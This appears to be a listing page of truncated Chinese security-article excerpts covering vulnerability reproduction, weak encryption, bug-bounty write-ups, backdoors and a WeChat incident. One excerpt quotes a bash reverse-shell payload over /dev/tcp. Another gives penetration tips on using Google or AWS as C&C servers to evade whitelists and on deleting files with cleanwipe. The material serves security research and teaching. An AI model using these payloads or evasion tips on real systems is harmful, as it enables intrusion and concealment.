噩耗传来就这样被你征服，喝下你藏好的毒。。。。真的是爆头【抱头】唱征服。亡羊补牢反手就做个更新。漏洞复现• 后台增加可执行的语句。• 创建非管理组的用户• 换浏览器登录选择小明账户登...

一、什么是加密强度不足?大多数密码系统都需要足够的密钥大小来抵御暴力攻击。软件使用理论上合理的加密方案存储或传输敏感数据，但强度不足以达到所需的保护级别。RSA是目前最有影响力和最常用...

这是 酒仙桥六号部队 的第 100 篇文章。全文共计2096个字，预计阅读时长8分钟。前言接了个项目，给了资产列表，刚开始就只挖了几个小洞，正当自暴自弃、随缘挖洞的时候，点开了...

这是 酒仙桥六号部队 的第 131 篇文章。全文共计2834个字，预计阅读时长9分钟。一、前言本文记录某项目，在开始尝试各类漏洞未果的情况下，利用平台的逻辑缺陷，打造出一份高质...

Bash Special Redirection 分析安全脉搏SecPulse.Com独家发文，如需转载，请先联系授权。0x00 Background在反弹 shell 的时候经常遇到这样的 payload:bash -i 1>&/dev/tcp/${H...

0X00 前言Newtonsoft.Json，这是一个开源的Json.Net库，官方地址：https://www.newtonsoft.com/json ，一个读写Json效率非常高的.Net库，在做开发的时候，很多数据交换都是以json格式传输...

0x00 缘起在风和日丽的周五，我抱着今天搬完砖明天葛优躺的心态开开心心、快快乐乐的工作，没成想刚接到一通电话，电话的那边传来周六需要加班的噩耗，直接打破了周六的葛优躺计划，我周六加班...

我收集了一些渗透测试tips，同时欢迎大家补充。1.使用高知名度的网站（如：Google ，aws）做C&C 控制服务器，这样可以绕过白名单限制；2.使用cleanwipe删除文件，因为它不需要管理员权限；...

本文作者：Micropoor本文属于安全脉搏专栏作者分享暨金币奖励计划转载请参考：https://www.secpulse.com/archives/61458.html第四季是一个过渡季，过渡后门在对抗升级中由传统后门，衍生成锁定...

作者：hu1y40（洞源实验室，安全工程师） 一、 事件背景腾讯旗下的微信是一款社交通讯应用程序，由中国互联网巨头腾讯公司开发和运营。作为一款领先的社交应用，微信在全球范围内拥有...